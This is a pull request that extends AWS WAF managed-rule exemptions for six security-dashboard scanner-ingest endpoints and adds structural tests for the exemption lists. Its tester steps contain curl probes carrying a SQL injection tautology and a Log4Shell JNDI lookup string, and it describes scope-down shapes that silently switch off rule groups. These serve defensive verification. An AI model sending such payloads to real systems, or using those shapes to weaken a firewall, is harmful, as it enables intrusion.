### PR TITLE
fix(waf): exempt the scanner-ingest paths from every signature group, not just CommonRuleSet

### DIFF
--- a/infra/__tests__/wafPolicy.test.ts
+++ b/infra/__tests__/wafPolicy.test.ts
@@ -84,6 +84,118 @@ function settingsUpdateExemption(stage: string): UriPathMatch | undefined {
   return uriPathMatches(commonRuleSetScopeDown(stage)).find(m => m.searchString === '/api/settings/update');
 }
 
+/**
+ * The six machine-posted scanner-ingest endpoints, each a static route file under
+ * apps/client/pages/api/admin/security-dashboard/ with nothing routed below it.
+ *
+ * They post raw scanner output, which the signature groups read as an attack payload. Probed
+ * live against staging: a benign report body reaches the app (403 application/json from the
+ * ingest token check), a real ZAP "SQL Injection" alert body comes back as a CloudFront 403 from
+ * SQLiRuleSet, and a `${jndi:` body comes back the same way from KnownBadInputsRuleSet. Managed
+ * rule groups enforce as soon as the firewall is attached, while every production rate limit is
+ * only counting, so a group missing from the exemption list breaks the weekly ingest at the
+ * moment the firewall goes on rather than a week later.
+ */
+const INGEST_PATHS = [
+  '/api/admin/security-dashboard/attack-simulation-ingest',
+  '/api/admin/security-dashboard/cloud-prowler-ingest',
+  '/api/admin/security-dashboard/code-semgrep-ingest',
+  '/api/admin/security-dashboard/packages-ingest',
+  '/api/admin/security-dashboard/secrets-ingest',
+  '/api/admin/security-dashboard/web-owasp-ingest',
+];
+
+// EXACTLY, not STARTS_WITH: an exemption is a hole in a rule group, so a prefix match hands that
+// hole to every future sibling route, and these paths have no siblings. LOWERCASE so casing
+// cannot change which requests fall through it.
+const ingestExemptions = (): UriPathMatch[] =>
+  INGEST_PATHS.map(searchString => ({
+    searchString,
+    positionalConstraint: 'EXACTLY',
+    textTransformations: ['LOWERCASE'],
+  }));
+
+/**
+ * Which managed rule groups may narrow themselves, and the complete exemption list each one
+ * carries. Pinned as whole sets, because an assertion that only looks for what should be present
+ * cannot see what should not: the previous version of this check used toContain on the search
+ * string alone, so both a widened match and an extra exempted path passed it.
+ *
+ * Any group absent from this table must carry no scope-down at all.
+ */
+const EXPECTED_SCOPE_DOWNS: Record<string, UriPathMatch[]> = {
+  'AWS-AWSManagedRulesCommonRuleSet': [
+    { searchString: '/api/modals/', positionalConstraint: 'STARTS_WITH', textTransformations: ['NONE'] },
+    { searchString: '/api/settings/update', positionalConstraint: 'EXACTLY', textTransformations: ['LOWERCASE'] },
+    ...ingestExemptions(),
+  ],
+  'AWS-AWSManagedRulesSQLiRuleSet': [
+    { searchString: '/api/ai/llm', positionalConstraint: 'STARTS_WITH', textTransformations: ['NONE'] },
+    { searchString: '/api/modals/', positionalConstraint: 'STARTS_WITH', textTransformations: ['NONE'] },
+    ...ingestExemptions(),
+  ],
+  'AWS-AWSManagedRulesKnownBadInputsRuleSet': ingestExemptions(),
+};
+
+/** Managed rule group rules for a stage, by rule name. */
+function managedRules(stage: string): Map<string, WafRule> {
+  const rules: WafRule[] = JSON.parse(buildDevWafRuleJson({ emergencyIpSetArn: mockEmergencyIpSetArn, stage }));
+  // any: ManagedRuleGroupStatement is deeply nested and not usefully typed here
+  return new Map(rules.filter(r => (r.Statement as any).ManagedRuleGroupStatement).map(r => [r.Name, r]));
+}
+
+/** Stable order for comparing two exemption lists as sets. */
+const sortMatches = (matches: UriPathMatch[]): UriPathMatch[] =>
+  [...matches].sort((a, b) =>
+    `${a.searchString} ${a.positionalConstraint}`.localeCompare(`${b.searchString} ${b.positionalConstraint}`)
+  );
+
+/**
+ * The exemption list of a scope-down, accepting only the literal shape
+ * NotStatement -> OrStatement -> ByteMatchStatement on UriPath.
+ *
+ * Structural on purpose, rather than a recursive search for paths. Every shape it rejects is a
+ * live bypass that a path walker reads as a pass:
+ *   - no NotStatement: the scope-down inverts, and the group applies to the exempted paths ONLY
+ *   - AndStatement in place of the Or: NOT(A AND B) is true for every request once two paths are
+ *     listed, so the group silently stops applying to anything at all
+ *   - a leaf on a non-UriPath FieldToMatch: invisible to a path walker, so the list reads as
+ *     empty and an empty-equals-empty assertion passes for entirely the wrong reason
+ *   - any other statement type: a nested managed group, label or IP match is not a path exemption
+ */
+// any: deeply nested AWS WAF statement shapes
+function scopeDownExemptions(where: string, scopeDown: any): UriPathMatch[] {
+  expect(
+    Object.keys(scopeDown ?? {}),
+    `${where} must negate its exemptions; an inclusion applies the group to those paths ONLY`
+  ).toEqual(['NotStatement']);
+
+  const negated = scopeDown.NotStatement.Statement;
+  expect(
+    Object.keys(negated ?? {}),
+    `${where} must negate an OrStatement; NOT(A AND B) is true for every request and disables the group`
+  ).toEqual(['OrStatement']);
+  expect(Object.keys(negated.OrStatement), `${where} OrStatement shape`).toEqual(['Statements']);
+
+  // any: see above
+  const statements: any[] = negated.OrStatement.Statements;
+  statements.forEach((statement, i) => {
+    expect(Object.keys(statement), `${where} entry ${i} must be a plain ByteMatchStatement`).toEqual([
+      'ByteMatchStatement',
+    ]);
+    expect(
+      Object.keys(statement.ByteMatchStatement.FieldToMatch ?? {}),
+      `${where} entry ${i} must match on UriPath, or these path assertions cannot see it`
+    ).toEqual(['UriPath']);
+  });
+
+  return statements.map(s => ({
+    searchString: s.ByteMatchStatement.SearchString,
+    positionalConstraint: s.ByteMatchStatement.PositionalConstraint,
+    textTransformations: (s.ByteMatchStatement.TextTransformations ?? []).map((t: { Type: string }) => t.Type),
+  }));
+}
+
 describe('wafPolicy', () => {
   describe('getDevWafMeta', () => {
     it('returns WAF metadata with default name suffix for dev stage', () => {
@@ -284,6 +396,67 @@ describe('wafPolicy', () => {
         expect(shadow.Statement).toEqual(origin!.Statement);
       }
     });
+  });
+
+  // Replaces the CommonRuleSet-only ingest check that used to live under `terminating Allow
+  // rules`. That one asserted the six paths were present on one of the five groups, with
+  // toContain on the search string, which is how the SQLi and KnownBadInputs gaps survived
+  // review: CommonRuleSet is the group whose exemption was written, and the other two signature
+  // groups were never asked about.
+  //
+  // Both stages, every claim. The dev policy is what staging and every preview stage deploy, and
+  // it is the file the production rollout argument's traffic measurement came from, so a
+  // production-only guard leaves the bypass re-addable in the file that actually runs.
+  describe('managed rule group scope-downs', () => {
+    for (const stage of ['dev', 'production']) {
+      it(`exempts exactly the intended paths from exactly the intended ${stage} rule groups`, () => {
+        const managed = managedRules(stage);
+        expect(managed.size, `${stage} must have managed rule groups`).toBeGreaterThan(0);
+
+        // Which groups are narrowed is itself the invariant. AdminProtection and
+        // AmazonIpReputationList are unscoped, and a scope-down appearing on either would be an
+        // unreviewed hole that a per-group assertion would never look for.
+        const scopedDown = [...managed.values()]
+          // any: see the helpers above
+          .filter(rule => (rule.Statement as any).ManagedRuleGroupStatement.ScopeDownStatement)
+          .map(rule => rule.Name)
+          .sort();
+        expect(scopedDown, `${stage}: only these groups may narrow themselves`).toEqual(
+          Object.keys(EXPECTED_SCOPE_DOWNS).sort()
+        );
+
+        for (const [ruleName, expected] of Object.entries(EXPECTED_SCOPE_DOWNS)) {
+          const rule = managed.get(ruleName);
+          expect(rule, `${stage}: ${ruleName} must exist`).toBeDefined();
+
+          // any: see the helpers above
+          const scopeDown = (rule!.Statement as any).ManagedRuleGroupStatement.ScopeDownStatement;
+          const found = scopeDownExemptions(`${stage} ${ruleName} scope-down`, scopeDown);
+          expect(sortMatches(found), `${stage}: ${ruleName} exemption list`).toEqual(sortMatches(expected));
+        }
+      });
+
+      // Stated separately from the table above so the failure names the actual defect. The three
+      // signature groups inspect the same request body for different families, so an ingest path
+      // exempted from one and not the others is still blocked; the exemption is only meaningful
+      // if every group that has one carries the identical six.
+      it(`exempts the scanner ingest paths identically in every scoped ${stage} group`, () => {
+        const managed = managedRules(stage);
+
+        for (const ruleName of Object.keys(EXPECTED_SCOPE_DOWNS)) {
+          // any: see the helpers above
+          const scopeDown = (managed.get(ruleName)!.Statement as any).ManagedRuleGroupStatement.ScopeDownStatement;
+          const ingest = scopeDownExemptions(`${stage} ${ruleName} scope-down`, scopeDown).filter(m =>
+            INGEST_PATHS.includes(m.searchString)
+          );
+
+          expect(
+            sortMatches(ingest),
+            `${stage}: ${ruleName} must exempt all six scanner-ingest paths, spelled identically`
+          ).toEqual(sortMatches(ingestExemptions()));
+        }
+      });
+    }
   });
 
   // Every path match in a rate limit's scope-down, at any nesting depth. A limit may assert one
@@ -517,23 +690,6 @@ describe('wafPolicy', () => {
           .flatMap(r => uriPathMatches(r.Statement).map(m => m.searchString));
         const adminExemptions = exemptedPaths.filter(path => path.includes('/api/admin'));
         expect(adminExemptions, `${stage}: no Allow rule may reference the admin prefix`).toEqual([]);
-      }
-    });
-
-    it('exempts the scanner ingest paths from CommonRuleSet on both stages', () => {
-      for (const stage of ['dev', 'production']) {
-        const excluded = uriPathMatches(commonRuleSetScopeDown(stage)).map(m => m.searchString);
-
-        for (const path of [
-          '/api/admin/security-dashboard/web-owasp-ingest',
-          '/api/admin/security-dashboard/code-semgrep-ingest',
-          '/api/admin/security-dashboard/packages-ingest',
-          '/api/admin/security-dashboard/secrets-ingest',
-          '/api/admin/security-dashboard/cloud-prowler-ingest',
-          '/api/admin/security-dashboard/attack-simulation-ingest',
-        ]) {
-          expect(excluded, `${stage}: ${path} must stay exempt from CommonRuleSet`).toContain(path);
-        }
       }
     });
 

--- a/infra/waf/bike4mind-api-protection-dev.json
+++ b/infra/waf/bike4mind-api-protection-dev.json
@@ -253,7 +253,7 @@
                             "Type": "LOWERCASE"
                           }
                         ],
-                        "PositionalConstraint": "STARTS_WITH"
+                        "PositionalConstraint": "EXACTLY"
                       }
                     },
                     {
@@ -268,7 +268,7 @@
                             "Type": "LOWERCASE"
                           }
                         ],
-                        "PositionalConstraint": "STARTS_WITH"
+                        "PositionalConstraint": "EXACTLY"
                       }
                     },
                     {
@@ -283,7 +283,7 @@
                             "Type": "LOWERCASE"
                           }
                         ],
-                        "PositionalConstraint": "STARTS_WITH"
+                        "PositionalConstraint": "EXACTLY"
                       }
                     },
                     {
@@ -298,7 +298,7 @@
                             "Type": "LOWERCASE"
                           }
                         ],
-                        "PositionalConstraint": "STARTS_WITH"
+                        "PositionalConstraint": "EXACTLY"
                       }
                     },
                     {
@@ -313,7 +313,7 @@
                             "Type": "LOWERCASE"
                           }
                         ],
-                        "PositionalConstraint": "STARTS_WITH"
+                        "PositionalConstraint": "EXACTLY"
                       }
                     },
                     {
@@ -328,7 +328,7 @@
                             "Type": "LOWERCASE"
                           }
                         ],
-                        "PositionalConstraint": "STARTS_WITH"
+                        "PositionalConstraint": "EXACTLY"
                       }
                     }
                   ]
@@ -388,6 +388,96 @@
                         ],
                         "PositionalConstraint": "STARTS_WITH"
                       }
+                    },
+                    {
+                      "ByteMatchStatement": {
+                        "SearchString": "/api/admin/security-dashboard/web-owasp-ingest",
+                        "FieldToMatch": {
+                          "UriPath": {}
+                        },
+                        "TextTransformations": [
+                          {
+                            "Priority": 0,
+                            "Type": "LOWERCASE"
+                          }
+                        ],
+                        "PositionalConstraint": "EXACTLY"
+                      }
+                    },
+                    {
+                      "ByteMatchStatement": {
+                        "SearchString": "/api/admin/security-dashboard/code-semgrep-ingest",
+                        "FieldToMatch": {
+                          "UriPath": {}
+                        },
+                        "TextTransformations": [
+                          {
+                            "Priority": 0,
+                            "Type": "LOWERCASE"
+                          }
+                        ],
+                        "PositionalConstraint": "EXACTLY"
+                      }
+                    },
+                    {
+                      "ByteMatchStatement": {
+                        "SearchString": "/api/admin/security-dashboard/packages-ingest",
+                        "FieldToMatch": {
+                          "UriPath": {}
+                        },
+                        "TextTransformations": [
+                          {
+                            "Priority": 0,
+                            "Type": "LOWERCASE"
+                          }
+                        ],
+                        "PositionalConstraint": "EXACTLY"
+                      }
+                    },
+                    {
+                      "ByteMatchStatement": {
+                        "SearchString": "/api/admin/security-dashboard/secrets-ingest",
+                        "FieldToMatch": {
+                          "UriPath": {}
+                        },
+                        "TextTransformations": [
+                          {
+                            "Priority": 0,
+                            "Type": "LOWERCASE"
+                          }
+                        ],
+                        "PositionalConstraint": "EXACTLY"
+                      }
+                    },
+                    {
+                      "ByteMatchStatement": {
+                        "SearchString": "/api/admin/security-dashboard/cloud-prowler-ingest",
+                        "FieldToMatch": {
+                          "UriPath": {}
+                        },
+                        "TextTransformations": [
+                          {
+                            "Priority": 0,
+                            "Type": "LOWERCASE"
+                          }
+                        ],
+                        "PositionalConstraint": "EXACTLY"
+                      }
+                    },
+                    {
+                      "ByteMatchStatement": {
+                        "SearchString": "/api/admin/security-dashboard/attack-simulation-ingest",
+                        "FieldToMatch": {
+                          "UriPath": {}
+                        },
+                        "TextTransformations": [
+                          {
+                            "Priority": 0,
+                            "Type": "LOWERCASE"
+                          }
+                        ],
+                        "PositionalConstraint": "EXACTLY"
+                      }
                     }
                   ]
                 }
@@ -411,7 +501,107 @@
       "Statement": {
         "ManagedRuleGroupStatement": {
           "VendorName": "AWS",
-          "Name": "AWSManagedRulesKnownBadInputsRuleSet"
+          "Name": "AWSManagedRulesKnownBadInputsRuleSet",
+          "ScopeDownStatement": {
+            "NotStatement": {
+              "Statement": {
+                "OrStatement": {
+                  "Statements": [
+                    {
+                      "ByteMatchStatement": {
+                        "SearchString": "/api/admin/security-dashboard/web-owasp-ingest",
+                        "FieldToMatch": {
+                          "UriPath": {}
+                        },
+                        "TextTransformations": [
+                          {
+                            "Priority": 0,
+                            "Type": "LOWERCASE"
+                          }
+                        ],
+                        "PositionalConstraint": "EXACTLY"
+                      }
+                    },
+                    {
+                      "ByteMatchStatement": {
+                        "SearchString": "/api/admin/security-dashboard/code-semgrep-ingest",
+                        "FieldToMatch": {
+                          "UriPath": {}
+                        },
+                        "TextTransformations": [
+                          {
+                            "Priority": 0,
+                            "Type": "LOWERCASE"
+                          }
+                        ],
+                        "PositionalConstraint": "EXACTLY"
+                      }
+                    },
+                    {
+                      "ByteMatchStatement": {
+                        "SearchString": "/api/admin/security-dashboard/packages-ingest",
+                        "FieldToMatch": {
+                          "UriPath": {}
+                        },
+                        "TextTransformations": [
+                          {
+                            "Priority": 0,
+                            "Type": "LOWERCASE"
+                          }
+                        ],
+                        "PositionalConstraint": "EXACTLY"
+                      }
+                    },
+                    {
+                      "ByteMatchStatement": {
+                        "SearchString": "/api/admin/security-dashboard/secrets-ingest",
+                        "FieldToMatch": {
+                          "UriPath": {}
+                        },
+                        "TextTransformations": [
+                          {
+                            "Priority": 0,
+                            "Type": "LOWERCASE"
+                          }
+                        ],
+                        "PositionalConstraint": "EXACTLY"
+                      }
+                    },
+                    {
+                      "ByteMatchStatement": {
+                        "SearchString": "/api/admin/security-dashboard/cloud-prowler-ingest",
+                        "FieldToMatch": {
+                          "UriPath": {}
+                        },
+                        "TextTransformations": [
+                          {
+                            "Priority": 0,
+                            "Type": "LOWERCASE"
+                          }
+                        ],
+                        "PositionalConstraint": "EXACTLY"
+                      }
+                    },
+                    {
+                      "ByteMatchStatement": {
+                        "SearchString": "/api/admin/security-dashboard/attack-simulation-ingest",
+                        "FieldToMatch": {
+                          "UriPath": {}
+                        },
+                        "TextTransformations": [
+                          {
+                            "Priority": 0,
+                            "Type": "LOWERCASE"
+                          }
+                        ],
+                        "PositionalConstraint": "EXACTLY"
+                      }
+                    }
+                  ]
+                }
+              }
+            }
+          }
         }
       },
       "OverrideAction": {

--- a/infra/waf/bike4mind-api-protection-prod.json
+++ b/infra/waf/bike4mind-api-protection-prod.json
@@ -258,7 +258,7 @@
                             "Type": "LOWERCASE"
                           }
                         ],
-                        "PositionalConstraint": "STARTS_WITH"
+                        "PositionalConstraint": "EXACTLY"
                       }
                     },
                     {
@@ -273,7 +273,7 @@
                             "Type": "LOWERCASE"
                           }
                         ],
-                        "PositionalConstraint": "STARTS_WITH"
+                        "PositionalConstraint": "EXACTLY"
                       }
                     },
                     {
@@ -288,7 +288,7 @@
                             "Type": "LOWERCASE"
                           }
                         ],
-                        "PositionalConstraint": "STARTS_WITH"
+                        "PositionalConstraint": "EXACTLY"
                       }
                     },
                     {
@@ -303,7 +303,7 @@
                             "Type": "LOWERCASE"
                           }
                         ],
-                        "PositionalConstraint": "STARTS_WITH"
+                        "PositionalConstraint": "EXACTLY"
                       }
                     },
                     {
@@ -318,7 +318,7 @@
                             "Type": "LOWERCASE"
                           }
                         ],
-                        "PositionalConstraint": "STARTS_WITH"
+                        "PositionalConstraint": "EXACTLY"
                       }
                     },
                     {
@@ -333,7 +333,7 @@
                             "Type": "LOWERCASE"
                           }
                         ],
-                        "PositionalConstraint": "STARTS_WITH"
+                        "PositionalConstraint": "EXACTLY"
                       }
                     }
                   ]
@@ -401,6 +401,96 @@
                         ],
                         "PositionalConstraint": "STARTS_WITH"
                       }
+                    },
+                    {
+                      "ByteMatchStatement": {
+                        "SearchString": "/api/admin/security-dashboard/web-owasp-ingest",
+                        "FieldToMatch": {
+                          "UriPath": {}
+                        },
+                        "TextTransformations": [
+                          {
+                            "Priority": 0,
+                            "Type": "LOWERCASE"
+                          }
+                        ],
+                        "PositionalConstraint": "EXACTLY"
+                      }
+                    },
+                    {
+                      "ByteMatchStatement": {
+                        "SearchString": "/api/admin/security-dashboard/code-semgrep-ingest",
+                        "FieldToMatch": {
+                          "UriPath": {}
+                        },
+                        "TextTransformations": [
+                          {
+                            "Priority": 0,
+                            "Type": "LOWERCASE"
+                          }
+                        ],
+                        "PositionalConstraint": "EXACTLY"
+                      }
+                    },
+                    {
+                      "ByteMatchStatement": {
+                        "SearchString": "/api/admin/security-dashboard/packages-ingest",
+                        "FieldToMatch": {
+                          "UriPath": {}
+                        },
+                        "TextTransformations": [
+                          {
+                            "Priority": 0,
+                            "Type": "LOWERCASE"
+                          }
+                        ],
+                        "PositionalConstraint": "EXACTLY"
+                      }
+                    },
+                    {
+                      "ByteMatchStatement": {
+                        "SearchString": "/api/admin/security-dashboard/secrets-ingest",
+                        "FieldToMatch": {
+                          "UriPath": {}
+                        },
+                        "TextTransformations": [
+                          {
+                            "Priority": 0,
+                            "Type": "LOWERCASE"
+                          }
+                        ],
+                        "PositionalConstraint": "EXACTLY"
+                      }
+                    },
+                    {
+                      "ByteMatchStatement": {
+                        "SearchString": "/api/admin/security-dashboard/cloud-prowler-ingest",
+                        "FieldToMatch": {
+                          "UriPath": {}
+                        },
+                        "TextTransformations": [
+                          {
+                            "Priority": 0,
+                            "Type": "LOWERCASE"
+                          }
+                        ],
+                        "PositionalConstraint": "EXACTLY"
+                      }
+                    },
+                    {
+                      "ByteMatchStatement": {
+                        "SearchString": "/api/admin/security-dashboard/attack-simulation-ingest",
+                        "FieldToMatch": {
+                          "UriPath": {}
+                        },
+                        "TextTransformations": [
+                          {
+                            "Priority": 0,
+                            "Type": "LOWERCASE"
+                          }
+                        ],
+                        "PositionalConstraint": "EXACTLY"
+                      }
                     }
                   ]
                 }
@@ -424,7 +514,107 @@
       "Statement": {
         "ManagedRuleGroupStatement": {
           "VendorName": "AWS",
-          "Name": "AWSManagedRulesKnownBadInputsRuleSet"
+          "Name": "AWSManagedRulesKnownBadInputsRuleSet",
+          "ScopeDownStatement": {
+            "NotStatement": {
+              "Statement": {
+                "OrStatement": {
+                  "Statements": [
+                    {
+                      "ByteMatchStatement": {
+                        "SearchString": "/api/admin/security-dashboard/web-owasp-ingest",
+                        "FieldToMatch": {
+                          "UriPath": {}
+                        },
+                        "TextTransformations": [
+                          {
+                            "Priority": 0,
+                            "Type": "LOWERCASE"
+                          }
+                        ],
+                        "PositionalConstraint": "EXACTLY"
+                      }
+                    },
+                    {
+                      "ByteMatchStatement": {
+                        "SearchString": "/api/admin/security-dashboard/code-semgrep-ingest",
+                        "FieldToMatch": {
+                          "UriPath": {}
+                        },
+                        "TextTransformations": [
+                          {
+                            "Priority": 0,
+                            "Type": "LOWERCASE"
+                          }
+                        ],
+                        "PositionalConstraint": "EXACTLY"
+                      }
+                    },
+                    {
+                      "ByteMatchStatement": {
+                        "SearchString": "/api/admin/security-dashboard/packages-ingest",
+                        "FieldToMatch": {
+                          "UriPath": {}
+                        },
+                        "TextTransformations": [
+                          {
+                            "Priority": 0,
+                            "Type": "LOWERCASE"
+                          }
+                        ],
+                        "PositionalConstraint": "EXACTLY"
+                      }
+                    },
+                    {
+                      "ByteMatchStatement": {
+                        "SearchString": "/api/admin/security-dashboard/secrets-ingest",
+                        "FieldToMatch": {
+                          "UriPath": {}
+                        },
+                        "TextTransformations": [
+                          {
+                            "Priority": 0,
+                            "Type": "LOWERCASE"
+                          }
+                        ],
+                        "PositionalConstraint": "EXACTLY"
+                      }
+                    },
+                    {
+                      "ByteMatchStatement": {
+                        "SearchString": "/api/admin/security-dashboard/cloud-prowler-ingest",
+                        "FieldToMatch": {
+                          "UriPath": {}
+                        },
+                        "TextTransformations": [
+                          {
+                            "Priority": 0,
+                            "Type": "LOWERCASE"
+                          }
+                        ],
+                        "PositionalConstraint": "EXACTLY"
+                      }
+                    },
+                    {
+                      "ByteMatchStatement": {
+                        "SearchString": "/api/admin/security-dashboard/attack-simulation-ingest",
+                        "FieldToMatch": {
+                          "UriPath": {}
+                        },
+                        "TextTransformations": [
+                          {
+                            "Priority": 0,
+                            "Type": "LOWERCASE"
+                          }
+                        ],
+                        "PositionalConstraint": "EXACTLY"
+                      }
+                    }
+                  ]
+                }
+              }
+            }
+          }
         }
       },
       "OverrideAction": {


### PR DESCRIPTION
# Pull Request

## Description

PR #2175 removed the blanket `/api/admin/` terminating `Allow` from the production WAF policy and replaced it with six security-dashboard ingest paths excluded from `AWSManagedRulesCommonRuleSet`. The blanket `Allow` had exempted those POSTs from **all five** managed rule groups. The replacement exempts them from **one**.

Two groups still block them:

- `AWSManagedRulesSQLiRuleSet` already carries its own `ScopeDownStatement` exemption list (`/api/ai/llm`, `/api/modals/`), and the six ingest paths were never added to it.
- `AWSManagedRulesKnownBadInputsRuleSet` has no scope-down at all.

This matters on day one specifically. Managed rule groups enforce the moment the WebACL is attached, while every production rate limit is currently in `Count` for a measurement week. The weekly ZAP job posts raw scanner output, forwarding `description`, `recommendation` and `instances[].evidence` verbatim from ZAP alerts, so a report that carries a SQLi tautology or a `${jndi:` string never reaches the app. The summarizer exits non-zero on a non-ok response, so it surfaces as a red weekly job rather than silently, but the security dashboard goes stale until someone looks.

### Reproduced live on staging

Staging already runs this exact configuration, so it reproduces there today. Against `/api/admin/security-dashboard/web-owasp-ingest`, an app-level `403 application/json` means the request cleared the WAF and the ingest-token check rejected it, while a CloudFront `403 text/html` means a managed group blocked it:

| request body | result | verdict |
| --- | --- | --- |
| benign report body | `403 application/json` | reached the app, so the CommonRuleSet exemption works |
| `1' OR '1'='1 --` | `403 text/html` | blocked by SQLiRuleSet |
| `${jndi:ldap://example.com/a}` | `403 text/html` | blocked by KnownBadInputsRuleSet |

## Changes

Both `infra/waf/bike4mind-api-protection-prod.json` and `infra/waf/bike4mind-api-protection-dev.json`, identically, so the two files stay byte-identical for managed-rule configuration:

- Added the six ingest paths to `AWSManagedRulesSQLiRuleSet`'s existing `NotStatement` / `OrStatement` exemption list.
- Gave `AWSManagedRulesKnownBadInputsRuleSet` a new `NotStatement` / `OrStatement` scope-down carrying the same six.
- Tightened `AWSManagedRulesCommonRuleSet`'s existing six from `STARTS_WITH` to `EXACTLY`, so all three lists are spelled the same way. An exemption is a hole in a rule group, so a prefix match hands that hole to any future sibling route, and all six are static route files under `apps/client/pages/api/admin/security-dashboard/` with nothing routed below them.

In `infra/__tests__/wafPolicy.test.ts`, a new `managed rule group scope-downs` block that loops `['dev', 'production']` and asserts, per stage:

- **which** groups may carry a scope-down at all, pinned to exactly the three. A scope-down appearing on `AdminProtectionRuleSet` or `AmazonIpReputationList` fails the build.
- each group's **complete** exemption list, as an exact set of `{ searchString, positionalConstraint, textTransformations }` triples. No `toContain`, and no `.includes()` used as an assertion.
- the literal statement shape: `NotStatement` -> `OrStatement` -> every leaf exactly a `ByteMatchStatement` on exactly `UriPath`.

Also removed the previous `exempts the scanner ingest paths from CommonRuleSet on both stages` test. It asserted the six paths were present on one of the five groups using `toContain` on the search string alone, which is precisely why this gap survived review: it named the group whose exemption had been written and never asked about the other two signature groups.

### Why the shape assertion is structural rather than a path search

Every shape it rejects is a live bypass that a recursive path walker reads as a pass:

- **No `NotStatement`.** The scope-down inverts and the group applies to the exempted paths *only*, leaving every other route uninspected.
- **`AndStatement` in place of the `Or`.** `NOT(A AND B)` is true for every request once two paths are listed, so the entire managed rule group silently stops applying to anything, while every path still reads as present.
- **A leaf on a non-`UriPath` `FieldToMatch`.** Invisible to a path walker, so the list reads as empty and an empty-equals-empty assertion passes for entirely the wrong reason.
- **Any other statement type.** A nested managed group, label match or IP match is not a path exemption.

## Guide for Testers

Infrastructure-only change. There is no UI, and production is unaffected by this merge on its own, because the production WAF has no WebACL attached today. The observable surface is staging, after it redeploys with this policy.

**Automated checks (any environment, no deploy needed)**

1. From the repo root, run `pnpm install`.
2. Run `pnpm exec vitest run --dir infra`. Expect `42 passed`. Note the flag form: `vitest run infra/` is a substring filter that also collects `packages/database/src/models/infra` and fails.

**Staging verification (after this merges and staging redeploys)**

1. Confirm the WAF is live on staging: run `curl -s -o /dev/null -w "%{http_code} %{content_type}\n" --get --data-urlencode "q=1' OR '1'='1" https://app.staging.bike4mind.com/api/health`. Expect `403 text/html`, a CloudFront block. If this returns `200 application/json` the WebACL is not attached and the rest of this section proves nothing.
2. Post a benign body to the ingest path: `curl -s -o /dev/null -w "%{http_code} %{content_type}\n" -X POST https://app.staging.bike4mind.com/api/admin/security-dashboard/web-owasp-ingest -H 'content-type: application/json' -H 'x-ingest-token: invalid-probe' --data '{"alerts":[{"name":"Cookie without Secure flag","description":"benign finding"}]}'`. Expect `403 application/json`, which means the request reached the app and the ingest-token check rejected it. This is the control.
3. Repeat step 2 with a SQLi tautology in the body: `--data '{"alerts":[{"name":"SQL Injection","description":"1'"'"' OR '"'"'1'"'"'='"'"'1 --"}]}'`. Expect `403 application/json`. Before this change it was `403 text/html`.
4. Repeat step 2 with a Log4Shell string in the body: `--data '{"alerts":[{"name":"Log4Shell","description":"${jndi:ldap://example.com/a}"}]}'`. Expect `403 application/json`. Before this change it was `403 text/html`.
5. Confirm the change did not widen anything: post the same SQLi body to a path that is *not* on any exemption list, for example `https://app.staging.bike4mind.com/api/health`. Expect `403 text/html`, still blocked.

**Regression checks**

1. Trigger the Website OWASP ZAP Scan workflow against staging and confirm the summarize-and-ingest step exits zero and the security dashboard's web/OWASP panel shows a fresh timestamp.
2. Confirm the admin settings PUT still saves prompt text containing `../`, which is the pre-existing `/api/settings/update` exemption in the same scope-down and is untouched here.
3. Confirm an ordinary Cypress E2E run against staging still passes, since the rate limits in the same files are untouched.

**What NOT to test**

- Any production behaviour. Production has no WebACL attached, so nothing in this PR changes what production does until `ENABLE_WAF` is turned on, which is deliberately not part of this change.
- Rate limits, thresholds or `Count` versus `Block`. Untouched.
- UI, screenshots, responsiveness. There is no UI in this change.

## Additional Information

**WCU is not tight, and I measured it rather than estimating.** A reasonable per-transformation estimate suggests two scope-downs of six byte matches would cost roughly 130 WCU, which against the 1500 basic-tier ceiling would have argued for the cheaper alternative of a single narrow terminating `Allow`. `aws wafv2 check-capacity` says otherwise:

| policy | before | after | ceiling |
| --- | --- | --- | --- |
| production | 1342 | **1366** | 1500 |
| dev | 1368 | **1392** | 1500 |

+24 total. The `1342` matches the figure recorded independently in the capacity review, which is what validates the method. So the scope-down route is affordable and the terminating-`Allow` alternative is off the table, which is the better outcome anyway: a terminating `Allow` at priority 3.x would have sat ahead of `emergency-ip-block` and bypassed break-glass, whereas a scope-down does not.

**Residual risk, stated rather than hidden.** After this change the six ingest paths are exempt from three of the five managed groups. `AdminProtectionRuleSet` contains only `AdminProtection_URIPATH`, which is already set to `Count`, so it contributes no enforcement. What actually still applies to these paths is `AmazonIpReputationList` plus the app-level ingest token. That is a real reduction, and it is still strictly tighter than the blanket `Allow` this replaced, which was terminating, sat ahead of `emergency-ip-block`, and covered every path under `/api/admin/` rather than six named endpoints.

**Out of scope, deliberately.** There is a seventh machine-posted, token-authed ingest endpoint, `/api/admin/rate-limits/ingest`, which is not on any exemption list and needs its own decision. I have left it alone here. Because this PR pins the exemption set exactly, adding it later forces a visible test edit rather than a silent one, which is the point.

## Developer Notes

- **Reusable pattern: pin the invariant, not the data.** `EXPECTED_SCOPE_DOWNS` is a table of group name to complete exemption list, and the test asserts the set of scoped-down groups equals the table's keys. That is what makes the guard fail on a *new* exemption rather than only on a removed one. The prior generation of these tests asserted the fixed data, which is why reverting a fix could stay green.
- **Reusable pattern: assert the statement shape, not just the values found in it.** `scopeDownExemptions` accepts only one literal nesting and rejects everything else, which is how the `Or` -> `And` and non-`UriPath` mutations get caught. Worth copying for any future WAF statement guard.
- **Both stages, every claim.** The dev policy is what staging and every preview stage actually deploy, and it is the file the production rollout argument's traffic measurement came from. A production-only guard leaves the bypass re-addable in the file that actually runs. Every assertion added here loops over both.

## Security Testing

- [x] Vulnerability reproduced on **staging** with a script/curl (output attached as PR comment)
- [ ] Fix verified on **PR preview** env with the same script (output attached as PR comment)
- [x] Production is assumed to match staging (no direct-to-prod deploys). If BEFORE reproduction on staging fails unexpectedly, verify no upstream fix has already landed: `git log origin/main -- <file>`

The preview box is unchecked because preview environments are maintainer-triggered and none exists for this branch yet. The exact commands to run against a preview once one is up are steps 2 through 5 of the staging section above, with the host swapped. Production is genuinely unaffected either way: it has no WebACL attached, which I re-verified before opening this.

## Checklist

- [x] I have added the new AdminSettings to Staging, prod and the hydration script (if applicable) . not applicable, no settings
- [x] I have made the UI/UX feel good (toasters, size, responsive, etc) . not applicable, no UI
- [x] I have performed a self-review of my own code
- [x] I have commented my code, particularly in hard-to-understand areas
- [x] I have made corresponding changes to the documentation (if applicable) . not applicable
- [x] My changes generate no new warnings
- [x] If adding/modifying telemetry fields: updated telemetry data classification doc . not applicable
